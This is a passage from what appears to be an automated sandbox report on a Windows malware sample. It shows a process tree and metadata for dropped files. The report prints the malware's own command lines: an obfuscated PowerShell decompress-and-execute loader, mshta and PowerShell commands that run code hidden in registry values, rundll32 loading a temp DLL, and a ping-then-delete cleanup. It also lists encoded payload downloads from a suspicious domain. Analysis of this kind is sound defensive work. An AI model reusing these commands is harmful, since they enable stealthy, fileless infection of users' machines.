bxgtBDsdCX/Om73rQ6bNsaoXdv7qHVtI7XdqyodmhEg188NDclNTYkDHfTkKD5Wa2OoVTOOoWSBMLmX0t4KdCNKGa2XNpuM42Hnu1XYtdck9VEYJWOyuaJkrFBdju8aeKeRwz01hl5IiDiYGX4pfojpX6FHNK5hjfSv3xn5J2KjInkimWc1R+cy5U05+SkxB76ezW1UUSXYvDXuAsavSC6VnmfTl5ebJ9ThYlorxJFc8Ne1zVt6P87pSxRDF980Bdf4dDhPZM+EksgoCcbdkCFzOAtXnSpGIlxiI0eD3qQtOlgnfyHiFCcdsfSK9l8+TU/PnOjlhtBmizclCQFmXSzWODNcDy57ueEWJ94IE/Y56Pdlkb3KL5CDd5LNLcQl7rXhx4Z1ybbsXuaXu24tzo5xOAUHmUvF13+Q2n4aygGZE8dcXTmnb2XF4PDGV7lSgEb4O4bjLweuqxoOvs8ul4lpoRFo9uZytITy2sZd7F1bqNbtTMGrCCuuwxKU1N7GoJbttxDMhsL22YqI6XI/tkKYJD1Av2UlNQWyMOzV6I86EoVMsCbZKj/lm71M5c4d9WNwBjRrPIU4D7ct1UPuTQvs9kVRS98xOu4rs2aRKWJvsnOqzIw/r8Y7dZhtxZvqc3fIzGcEhapABjFyPqlGhWPKWc0eJX4jaBhLI6k4twuyqPVNH1W8CM6xxci2tSKn19x4HZ+wB3+2OhXU27QLztnjg2tIaZGgNdDU4J5a9c6ae4yrTKtzkjro1Mih3UvPm6iblorgPvJ4NvHeP47Hmxgl2l+E46ngf92itJk/vgHwd11tEr4xuVvsIwTfP1bDmcn6ju3UyaoV6zD7iqAv+Nl9bPabquEYevWIK7AUc3ohEyhsZrawemm9ZLJJW/sLox1MVthht3rNPy7juGGk61uaQSG+FSdWXNaiFoWQBSQbp1YTWLB3HpcOr+ogTqBhxTvbxyzT45Alz8vt5N7QFOi7dXJ0LCi2ar+BKZootXt7HH3Dc1aN8X5rBRJxSCiNETlYgWz3skVtH6F2MH9MBCbmA7jrMQxJ0R8SNEk2B/XW3Ith7XkZkPCmP6kr4JOQwSL3eZfWp06uOqchMQS/L5ELXTZcqNrVuWzeE8fdBSeGQsRFhSqupPDFB42/G/iJ6c3af06zy4Z29R5u9Sf4QM8qF6d7lYPr93RTNwrlw+b4xr3JsLtyrvA8RaRAhi7fPnOta36Jvm1vNwTD7w9211+Zi9WEpvf03Q4pGcdFG9HU7zpe3/DSb5/ZOlzmMXaQxl4mrxcaGQYoFwz0QX1kEy6Xw2MopNgojKYXdUsEl8FdNGbLIaHMJ5ZPYVKxgyqU6UAcb1HpzehBHgE+nuE2eNGrc9aKp2te0A9eEy2xXDp+ribtaxkzYVyuKhDP3cnaHukgoFg8NrypNKRAd/Gifarrx5otP7UdwIvXcZDqoJ7P2uBDcmaEUQt5l7Sm0s1z0ntqCU5FUSQZ0k66oHydP3PGbSRpN3LIPSAP3fERsvCcnAwsjzUgE/nW+h8XdfszOgJSUTEbaaeG7OSJEJoEk2+ll1IkZZub7Epxu56Kfl0c1Yz29VcKMvc5nGSJi/vVGGilgjFNVdFc3ugRINFMSVxpZtRr15c2TpUpK3lsWptacWfTVsRdNhZ3zfwNK+v0ggpOTNZ+/aGJjjNlkF3r7meigz06Apmhqd2MBG7yxVyCzgMvf/vMnIIK/+SfguF+47jiAsih5fvn24+PP/89nf1FgNjk47UFlf5NawGg/fk+A/eZ4Bys7aBaAAlSODPmFCLT650FtGXVkmYMWWwd1/a8f//Pz4/tvBpupn3PmO5+ZdtVvgKICnMyUFMXHt4+f3z6BZTrrrJZ+/fbxvw==')'\'+ ([ChAr]44).TOStrINg()+ '\'[SYSTEm.IO.comPression.coMPRESsIoNMODe]::DecOMpreSs)) '\'+([ChAr]44).TOStrINg()+ '\'[SYsTEm.Text.ENcOdING]::AscII) ).rEAdToeNd( )'\'|.( $PShoMe[21]+$Pshome[30]+'X') MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

PING.EXE (PID: 4036 cmdline: 'C:\Windows\system32\PING.EXE' update.microsoft.com MD5: 6242E3D67787CCBF4E06AD2982853144)

rundll32.exe (PID: 2248 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user~1\AppData\Local\Temp\W. DllRegisterServer MD5: C648901695E275C8F2AD04B687A68CE2)

iexplore.exe (PID: 2596 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: CA1F703CD665867E8132D2946FB55750)

iexplore.exe (PID: 2692 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2596 CREDAT:275457 /prefetch:2 MD5: CA1F703CD665867E8132D2946FB55750)

ssvagent.exe (PID: 2624 cmdline: 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new MD5: 0953A0264879FD1E655B75B63B9083B7)

iexplore.exe (PID: 3092 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: CA1F703CD665867E8132D2946FB55750)

iexplore.exe (PID: 3124 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3092 CREDAT:275457 /prefetch:2 MD5: CA1F703CD665867E8132D2946FB55750)

iexplore.exe (PID: 2812 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: CA1F703CD665867E8132D2946FB55750)

iexplore.exe (PID: 3052 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2812 CREDAT:275457 /prefetch:2 MD5: CA1F703CD665867E8132D2946FB55750)

mshta.exe (PID: 3584 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>moveTo(-898,-989);resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\DCB842AC-8BFE-6E42-F5D0-EF82F90493D6\\DtshsPub'));if(!window.flag)close()</script>' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)

powershell.exe (PID: 3392 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Invoke-Expression ([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:Software\AppDataLow\Software\Microsoft\DCB842AC-8BFE-6E42-F5D0-EF82F90493D6').crypmgmt)) MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

csc.exe (PID: 3364 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ygdsonvv.cmdline' MD5: 0A1C81BDCB030222A0B0A652B2C89D8D)

cvtres.exe (PID: 3928 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES74FF.tmp' 'c:\Users\user\AppData\Local\Temp\CSC7436.tmp' MD5: 200FC355F85ECD4DB77FB3CAB2D01364)

csc.exe (PID: 268 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0kgxdqm.cmdline' MD5: 0A1C81BDCB030222A0B0A652B2C89D8D)

cvtres.exe (PID: 2016 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES9007.tmp' 'c:\Users\user\AppData\Local\Temp\CSC9006.tmp' MD5: 200FC355F85ECD4DB77FB3CAB2D01364)

explorer.exe (PID: 1432 cmdline: C:\Windows\Explorer.EXE MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

cmd.exe (PID: 412 cmdline: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\AppData\Local\Temp\W' MD5: AD7B9C14083B52BC532FBA5948342B98)

PING.EXE (PID: 4052 cmdline: ping localhost -n 5 MD5: 6242E3D67787CCBF4E06AD2982853144)

iexplore.exe (PID: 3684 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: CA1F703CD665867E8132D2946FB55750)

iexplore.exe (PID: 3856 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3684 CREDAT:275457 /prefetch:2 MD5: CA1F703CD665867E8132D2946FB55750)

cleanup

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	893
Entropy (8bit):	7.366016576663508
Encrypted:	false
MD5:	D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:	B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:	1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:	false
Preview:	0..y...H.........j0..f...1.0....H.........N0..J0..2.......D....'..09...@k0....H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0....H.............0..........P..W..be......,k0.[...}.@......3vI.?!I..N..>H.e...!.e..2....w..{........s.z..2..~..0....8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i.....)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0....H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..\|.Wv..(9..e...w.j..w.......)...55.1.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	252
Entropy (8bit):	2.992776518112182
Encrypted:	false
MD5:	ABCBD3227CB7893F39E8CE4BDA945BCF
SHA1:	976FF79F89E71FDAFB9A4D43111039037BA25F01
SHA-256:	B203E0CF8F928D4FC149C3912174F3DF8DF88609F705FA3CDAD781B20A7E8E18
SHA-512:	FB108703B98ADF2F30503842B214A75EDCC0297EEB4359AA84E0F2E785708749FEFFE6DA134ED01417556CC9D54508B0F6C7EF4E0876A6CBC1A86FFF482E3459
Malicious:	false
Preview:	p...... ....`....-......(....................................................... ........~!/.....Q..(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.7.5.1.2.2.9.6.b.3.0.0."...

C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 4-bit colormap, non-interlaced
Size (bytes):	237
Entropy (8bit):	6.1480026084285395
Encrypted:	false
MD5:	9FB559A691078558E77D6848202F6541
SHA1:	EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
SHA-256:	6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
SHA-512:	0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d...-PLTE......(..5..X..h...........................J4.I...IIDAT.[c`..&.(.....F....cX.(@.j.+@..K.(..2L....1.{.....c`]L9.&2.l...I..E.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5A5B55D1-1AA1-11EA-B7AC-B2C276BF9C88}.dat Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	29272
Entropy (8bit):	1.7718367164941486
Encrypted:	false
MD5:	6965A201F4E20E84C0463B7258FEC501
SHA1:	CD00A101D850A8F491B297DAD701156941881095
SHA-256:	AC39AFB05B472298D6337E6A9DF1B4694E9274D86D1EA86B5FE1C07A41DB4F98
SHA-512:	93F7C4C0AD1A11F3033696DE61A39EF4670DC9283C3FC219E3A7D3A175F99D44335647EEAA220EEF202B1E82FB75ED8BD2C9CE41CAAAB597EDA2BD056AC9891A
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7436F611-1AA1-11EA-B7AC-B2C276BF9C88}.dat Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	29272
Entropy (8bit):	1.7641901471837467
Encrypted:	false
MD5:	D737818B13A74E43884A452A5AFC4A49
SHA1:	90770C4D26D2A685A6FE08FAF7BA908BFF5E44BA
SHA-256:	3CF8A3F6A17E068A9B5CC4DFC9ABF23C65E7EB5FDD75B084C5453EE607A8CFDC
SHA-512:	DF14C40F9D1CA0F041B42C72A197AF0EF73AB6E23B7650F10B2FC2AEE58E5FD793B3D76125D1F91EBC92585C84F807A7659AB3D9828715E7A107F490E33FD282
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{75AD5701-1AA1-11EA-B7AC-B2C276BF9C88}.dat Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	29272
Entropy (8bit):	1.7609458151038238
Encrypted:	false
MD5:	5EC0C23F6ED04431F3EA753F06468FBB
SHA1:	016DB0A4284134FF489B72B3940A4693A95B6D24
SHA-256:	A324AF878FB0097A54FBD021D91122C73AAEBF716135D9C4FD5E0EDA92A7925D
SHA-512:	CA22C550FA5647129293F83BF8AB33FE46F1286A3B33CBDCEF14C5734F4D1BBD94D66D1D033663C67FBAF234C544561FFACEF2B6785D988F2A3EB86565592DFD
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7C1C9B21-1AA1-11EA-B7AC-B2C276BF9C88}.dat Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	29272
Entropy (8bit):	1.7720548356658365
Encrypted:	false
MD5:	9DBC18EDA15950FFE16AF4F2076ACF2F
SHA1:	30668FEA734F636E03AB70D10534274D803A3EC0
SHA-256:	72732C85E1C28E93B221F473A6C9F8161544889149AD84A8606D4A1FF526B8F7
SHA-512:	112F2450B63647E98F947B3230BBAE00662BE3F50B637D6CB2B99B202A743C35450975FB7CF80CD37745FD25588A709C4004FDDA6283C5C9A90809AFF5E9C93A
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5A5B55D3-1AA1-11EA-B7AC-B2C276BF9C88}.dat Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	27268
Entropy (8bit):	1.812801579926667
Encrypted:	false
MD5:	7F9E7F426789DC6E1DFFB2B3C7E94B02
SHA1:	29316BE362BA7A409BA7D7D6F332BF69F2846ED8
SHA-256:	562DC6DFF991DD40813C6029A03B76ADFACB8E166F48CB47A212E4B9F8175B63
SHA-512:	2060C2DAA6BA53817341D76086F6F5EA032EFF096466DB9568CB2DCB19C9B659C56796E5359B3381F18538FE2B700EC6805F9CAFDEB47F14D3557046C0854F06
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7436F613-1AA1-11EA-B7AC-B2C276BF9C88}.dat Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	27260
Entropy (8bit):	1.8095721394888487
Encrypted:	false
MD5:	C1AFC1081891D00CB9D7DBED8729E6EF
SHA1:	298E363A353AB2461114C6F7E5161C714966DB6C
SHA-256:	28E2A86A4F72534D3114D1EA6C2978A224B652E23D8AE4729A60A79AD54C4EC7
SHA-512:	516A6FD92F9CECD8A9EAE3E51CC83DD5559FA35BEA12452512B92B75483B2A48A7F98E12A73FDDF50BC8D16D9C881576C2A91404B3BEBBD07B4E94CB5F692D17
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{75AD5703-1AA1-11EA-B7AC-B2C276BF9C88}.dat Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	27356
Entropy (8bit):	1.838217606035769
Encrypted:	false
MD5:	D45EFDE65C2B8FCBE18E51657F469C81
SHA1:	8F5BFB38D672FCD1414AE8052A2ED7777D2A2567
SHA-256:	D5334F583A0AD98C00884F5B7A4EAFE9F14284286818A8BBEB9878882222CA32
SHA-512:	1EFC82C873CF31F8B8B5CD15FFFEB3D992FF6CF703FC28DB510061F73946116A4095B1DB0B14B460617B509AD829B0265F41E4D43CC0AD3F2A5E4DC0CF187A08
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7C1C9B23-1AA1-11EA-B7AC-B2C276BF9C88}.dat Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	27276
Entropy (8bit):	1.8161927675218128
Encrypted:	false
MD5:	D26D41413ABFAC914CBBCD13E125699F
SHA1:	6983CD1A6F286C06E7E1C01477BBCA0E0798A6AA
SHA-256:	34FFCF980DA2D809550F7E25A56BD5F284004CD7A5C4D82192DFDDBA9C3519E0
SHA-512:	A1C5D1F4F45C462CC38D0EB31C6561210AAFEC5EAFA4319FA9E63D38C6FFABE9CDB965BCD492778763601B393A0AC9C268A477E540F62ABFD15B8BFEC6B7425D
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\fb4mf11\imagestore.dat Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Size (bytes):	5652
Entropy (8bit):	4.124854840271873
Encrypted:	false
MD5:	712FA960D2CCD7948B940C4BB5060F13
SHA1:	5BB4D7023F4B91C4C8AAA462439371BE3EE99A57
SHA-256:	7E5D71BC01C9315B71BCBEA7980A3C7C446A1F5B9B31ADB22CE10C32E36751C0
SHA-512:	D6FB3EA473899BCFDF82F77E23D3EEB1613A6110B3B934FD9350C5CF18BE6AE5C9D4C9A45464952FCA02E208B84CEB1930D9241F5428873ACF4011E7B321DE43
Malicious:	false
Preview:	#.h.t.t.p.:././.l.a.d.d.l.o.a.n.a.l.a.o...x.y.z./.f.a.v.i.c.o.n...i.c.o.~............... .h.......(....... ..... .....@.....................s...s...s...sw..r.......s...s...s...s.......s...s..s...s...s...s...r...s{..s...s#..s...s..r..s..s...s[..s...s...s..s...s...s...s}..s...sW..r..s...sm..sK..sC..sw..s..s...s%..s!..s..s...s...s...sU..s.sY..s...s..s..r#......s...s...s..s...r%..s[..s...s...s..s]..s...r.sS..s...sq..........s...s...s...s...s.......su..s...s.......s...s..s.sA..............s%..s..s#......r...r...s]..........s...s..sk..s...s...........s...s...s]......s...r..s7..........s...s..r...r...s...r...........s...s.......s...s..s7..........s...s..si..s?..s7..s...........s...s.......s...s...rW..........s...s..s...s...s...s...........s...s[..........ss..s...s.......s...s..sm..sI..s;..s.......s!..s..s#......s...s...s..sQ......s...s..s...r...sm..s...r...s...r...s...s...r...s...sQ..s..rK..s...sg..s'..........s...s...s..s...s'..s_..s...s...s...rQ..s..s...sK..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\favicon[1].ico Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 4-bit colormap, non-interlaced
Size (bytes):	237
Entropy (8bit):	6.1480026084285395
Encrypted:	false
MD5:	9FB559A691078558E77D6848202F6541
SHA1:	EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
SHA-256:	6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
SHA-512:	0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d...-PLTE......(..5..X..h...........................J4.I...IIDAT.[c`..&.(.....F....cX.(@.j.+@..K.(..2L....1.{.....c`]L9.&2.l...I..E.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\XXEf[1].htm Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Size (bytes):	221968
Entropy (8bit):	5.999764642969449
Encrypted:	false
MD5:	660846CE25B3DADA2485DD8A068F655D
SHA1:	6111F6AA524ABFB3BDD1B4C84D46563066FFC0CE
SHA-256:	6DC5A7DFA3F9CC5F0322442AF3CA7FD680EEA693054790D260B373087F3CB49C
SHA-512:	D987CD8B6CD07A277A0922CD522F8D711724254607F4326A804C6340C6ECA05585C82FEF20EC438A7A22C16CA0441F190B3E405812C49F6C7D957B9A9E753651
Malicious:	false
Preview:	Y0Wtxr99bfukdREggVYhtM0rDkxxfWAnvzb0Po9iIYSGSXQ7xNQApb02MFJ5CbczPXlRgM+nQ2rn+xVxakKHMNTWRgOlJiReehuTf2uYO48tj7gqk7+Ty7MD1dO//UJCc6Dsvir23oJNsrEeZgMyPJ+IeEgdn2xyWOHg6v+PxYXbWavRjmX+VD5+vttuHQNx47S6/E2JO1du7XcQfxncFDFNtEVFGZpSg7X9ha+ch7fqARGzni+AYeexmbl+/3tZQgJIyvvWk0nxyHOHMbA9v+e/5HkERijehmz86b77r4NuNRvEPh96mKi8Dvw++6mAlF3WSjlCX6WOiYvJ4vrU7hEHxDQa7xWNrnEzdO2yj+KFTQ9vo10uzCcSeKK2GC1IbWIxSMu+BEFnLL3Bxd6MrPOUYmv5XqxaWELE3TgFXkojWu3Mog/2uIFGXc8EsqjD6BFE76yUjbLlZEaAAZFJrymfGozyeCYzomb4LfSZTi3B7tjHQFUZ3ZmS7j0KWg/koTfQyPl6PObIlBfOiDCzHFzubo8EeEZynVSNwtEUS4aVHiLbWj7qaAFDSpDKF7xIFxeKQk4zSYvhC/5t1S8uv93cWHjGh0s4SZnzkicYF8Ws0U8q3g6yfCNl0vTBf+n72tmCUNYQdVNwrbJa6a5vVRLsHfL6o7B3//PGEfJzPVGMGbWqulfkq7ug/TFccOxTyZwRu0a1jXDJc4mx9XjAV1BgrMCFRKz+gb8d6+6tYxtQuVjVTYXyVpfd8usuxbg7KhMfwurfTveSFo9gURCEnvkskGyHdcKQ17g9rk8h2DK3OR5eXwmsEq4/HWptu4I1L2z4NCwFEXj9N1MY/VI/qUu/qdDl2bCjPxo4T3fL+HBwspS8GLfvGSUWOWp7QcrNilUGkQHldEk6/cvyo+sTPQ2aDa3WDlmluD2XsPxM+TDrPK2bD9WQDrchSyT0r++vTpe9OcQV6ltQIqCieT/7ZBcwtWa4P070IWqtiRjI

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\favicon[1].ico Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
Size (bytes):	5430
Entropy (8bit):	4.0126861171462025
Encrypted:	false
MD5:	F74755B4757448D71FDCB4650A701816
SHA1:	0BCBE73D6A198F6E5EBAFA035B734A12809CEFA6
SHA-256:	E78286D0F5DFA2C85615D11845D1B29B0BFEC227BC077E74CB1FF98CE8DF4C5A
SHA-512:	E0FB5F740D67366106E80CBF22F1DA3CF1D236FE11F469B665236EC8F7C08DEA86C21EC8F8E66FC61493D6A8F4785292CE911D38982DBFA7F5F51DADEBCC8725
Malicious:	false
Preview:	............ .h...&... .... .........(....... ..... .....@.....................s...s...s...sw..r.......s...s...s...s.......s...s..s...s...s...s...r...s{..s...s#..s...s..r..s..s...s[..s...s...s..s...s...s...s}..s...sW..r..s...sm..sK..sC..sw..s..s...s%..s!..s..s...s...s...sU..s.sY..s...s..s..r#......s...s...s..s...r%..s[..s...s...s..s]..s...r.sS..s...sq..........s...s...s...s...s.......su..s...s.......s...s..s.sA..............s%..s..s#......r...r...s]..........s...s..sk..s...s...........s...s...s]......s...r..s7..........s...s..r...r...s...r...........s...s.......s...s..s7..........s...s..si..s?..s7..s...........s...s.......s...s...rW..........s...s..s...s...s...s...........s...s[..........ss..s...s.......s...s..sm..sI..s;..s.......s!..s..s#......s...s...s..sQ......s...s..s...r...sm..s...r...s...r...s...s...r...s...sQ..s..rK..s...sg..s'..........s...s...s..s...s'..s_..s...s...s...rQ..s..s...sK..r/..s3..sa..s...s...s!..s#..s..s...s...s...s...s...s...sy..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\hBVHp[1].htm Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Size (bytes):	2352
Entropy (8bit):	5.985785837278986
Encrypted:	false
MD5:	448670785E9E57177EFA713BCE6B64DD
SHA1:	A07CCECF0E89F23EEB85D1103E9E7781E9175BE3
SHA-256:	EE9F7FB2231B8F57F48BDB7F649766B2D2D2C82B3F1CD1B091BCDD3864252B88
SHA-512:	D45DBB518CBE5E3E38A6D5F5F1B898E470DA49555465BDF11DCD6C21EB89B92FA1BA65CE83F77C989D90AE90C8DB42D917B88B937B1E32133BB68C50026DA106
Malicious:	false
Preview:	cBQQD6un+6pQAw/6MweKosejvmt3y6MefxtK6oemtHs1oiMoLvZMy2FUdPLSZFn/VECXv8uWggrgujJiueSiDClWzHvZxAwxAHOLQHQaL9IKOJ/ekVghaT6yJLz0dn8VaYfwrX6zfyIBMF4wnUQnMN8qQTRu5H/DI2pqzNXod/JIWB96F8+xY5ENITuizfH79/1yHKUGTP+nGE11OeljEccJPmHNGqB7fkU2aRsACHI+lWyTqZZYGt9+mn7jGlBpVBBfHwnuBMDES0DSUt9ixwjkbEVfCsRFeFoejxVSPTQdEZHXSBoEbDFlnVtHFo8OOAGCy4LYOsISPgjS6JienPc/jXEZPukLbinQeZmGv//4IHp0F80KmH/O13Mqv6TVZE9/60fZAGR+stGM0KjYVoMH0A68voe5SD1wAYu20q66MUDcYMHTM2P8IB0NhUTMZV7YSAGSBqL7TG3K9WcQ4i1FMOSnrrSuPa8pAgRxlb377CBkLRqAmVESba6goM4wVm7z57BK2MabsmyKPAH+WMq7Q3yLi3l7NBR89JVxLqEkQomUsBPgHqZ1ikfq0HqBY+MrJpKdVhT0ZYJI7vJ7XIbaVw7xOy9qrmZgxWr+iTHTDRmqQEILCwg9+eXQ7kP/b8dBVbRX4VLo9qjC3lDyAWT6+Bc15lzhsQ0IiCpsAw050a2up/TAdSl0sWhqCK7SRD1M1EsRmFWug6shfacR39e4dgkIm5xa/pkQrlxwaNXAzA+BP2L8GfckVObj/iWvEdRUsC+vfCDMXtWJxuO/rWb25m2o5esO0d71e/9bYTOXPSvU1c29wFf/VTBRItHypm/FpfhBpHF0baw0fiWDVAcH56OgZ4zAhRQE00dXYTtoDH1QbRoIQdjmSoVv606MRY2nU2yZATpS9z9Z/jXEm60p54BQdSdFufOEOyE3ow5E3emv+1IwldLpSVQWmaBHV0f6qXoGA5LjVFr5CBWMrRo2nx5CQf0Hn6gJHeX6

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\robot[1].png Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	PNG image data, 171 x 213, 8-bit colormap, non-interlaced
Size (bytes):	9497
Entropy (8bit):	7.951956564205225
Encrypted:	false
MD5:	AD987B53C3E3D588ADA95A39AC5AF6B6
SHA1:	C16184FF79886B86E314D83878526CDF00AE1D59
